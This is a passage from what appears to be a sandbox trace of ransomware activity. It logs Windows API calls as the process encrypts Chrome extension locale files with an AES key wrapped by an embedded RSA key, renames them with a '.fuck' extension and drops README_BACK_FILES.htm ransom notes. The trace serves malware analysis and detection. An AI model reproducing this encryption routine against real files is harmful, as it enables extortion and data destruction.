Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json", dwFileAttributes=0x0) returned 1 [0257.967] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json.gsg")) returned 1 [0257.968] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json.fuck")) returned 1 [0257.972] CryptDestroyHash (hHash=0x2e80080) returned 1 [0257.972] CryptDestroyKey (hKey=0x2e7fe80) returned 1 [0257.972] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0257.972] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.972] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0257.972] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\readme_back_files.htm")) returned 0xffffffff [0257.972] AreFileApisANSI () returned 1 [0257.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.972] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.973] GetFileType (hFile=0x5d50) returned 0x1 [0257.974] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.975] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.975] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7f9c0 [0257.975] FindNextFileA (in: hFindFile=0x2e7f9c0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.975] FindNextFileA (in: hFindFile=0x2e7f9c0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.975] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.975] GetLastError () returned 0x0 [0257.975] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json")) returned 0x20 [0257.975] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json", dwFileAttributes=0x80) returned 1 [0257.976] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.977] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.978] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.979] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0257.982] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.982] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0257.982] CryptHashData (hHash=0x2e7fec0, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.982] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fec0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fb40) returned 1 [0257.982] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.982] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.982] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7a148) returned 1 [0257.983] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7a148, dwCertEncodingType=0x1, pInfo=0x2e25920*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25950*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25958*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7f980) returned 1 [0257.983] CryptEncrypt (in: hKey=0x2e7f980, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.983] CryptEncrypt (in: hKey=0x2e7f980, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7ae90*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e7ae90*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.983] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e7ae90*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e7ae90*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.984] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xc4, lpOverlapped=0x0) returned 1 [0257.985] CryptEncrypt (in: hKey=0x2e7fb40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc4, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0257.985] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0257.986] CloseHandle (hObject=0x5d60) returned 1 [0257.986] CloseHandle (hObject=0x5d5c) returned 1 [0257.986] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json"), bFailIfExists=0) returned 1 [0257.989] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json", dwFileAttributes=0x0) returned 1 [0257.990] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json.gsg")) returned 1 [0257.991] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\messages.json.fuck")) returned 1 [0257.992] CryptDestroyHash (hHash=0x2e7fec0) returned 1 [0257.992] CryptDestroyKey (hKey=0x2e7fb40) returned 1 [0257.992] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0257.992] FindNextFileA (in: hFindFile=0x2e7f9c0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.992] FindClose (in: hFindFile=0x2e7f9c0 | out: hFindFile=0x2e7f9c0) returned 1 [0257.992] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\readme_back_files.htm")) returned 0xffffffff [0257.992] AreFileApisANSI () returned 1 [0257.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.992] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.993] GetFileType (hFile=0x5d50) returned 0x1 [0257.993] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.994] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.994] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0257.995] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.995] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.995] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.995] GetLastError () returned 0x0 [0257.995] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json")) returned 0x20 [0257.996] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json", dwFileAttributes=0x80) returned 1 [0257.997] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.997] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.998] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.998] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0258.000] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.000] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.000] CryptHashData (hHash=0x2e7fd80, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.000] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fd80, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fec0) returned 1 [0258.001] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.001] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.001] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7aa50) returned 1 [0258.001] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7aa50, dwCertEncodingType=0x1, pInfo=0x2e248e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24910*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24918*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ff80) returned 1 [0258.001] CryptEncrypt (in: hKey=0x2e7ff80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.001] CryptEncrypt (in: hKey=0x2e7ff80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7a698*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e7a698*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.001] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e7a698*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e7a698*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.002] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x150, lpOverlapped=0x0) returned 1 [0258.003] CryptEncrypt (in: hKey=0x2e7fec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x150, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x160) returned 1 [0258.003] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x160, lpOverlapped=0x0) returned 1 [0258.003] CloseHandle (hObject=0x5d5c) returned 1 [0258.003] CloseHandle (hObject=0x5d60) returned 1 [0258.004] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json"), bFailIfExists=0) returned 1 [0258.007] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json", dwFileAttributes=0x0) returned 1 [0258.007] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json.gsg")) returned 1 [0258.008] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\messages.json.fuck")) returned 1 [0258.009] CryptDestroyHash (hHash=0x2e7fd80) returned 1 [0258.010] CryptDestroyKey (hKey=0x2e7fec0) returned 1 [0258.010] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0258.010] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.010] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0258.010] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\readme_back_files.htm")) returned 0xffffffff [0258.010] AreFileApisANSI () returned 1 [0258.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0258.010] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.011] GetFileType (hFile=0x5d50) returned 0x1 [0258.011] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.013] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.014] 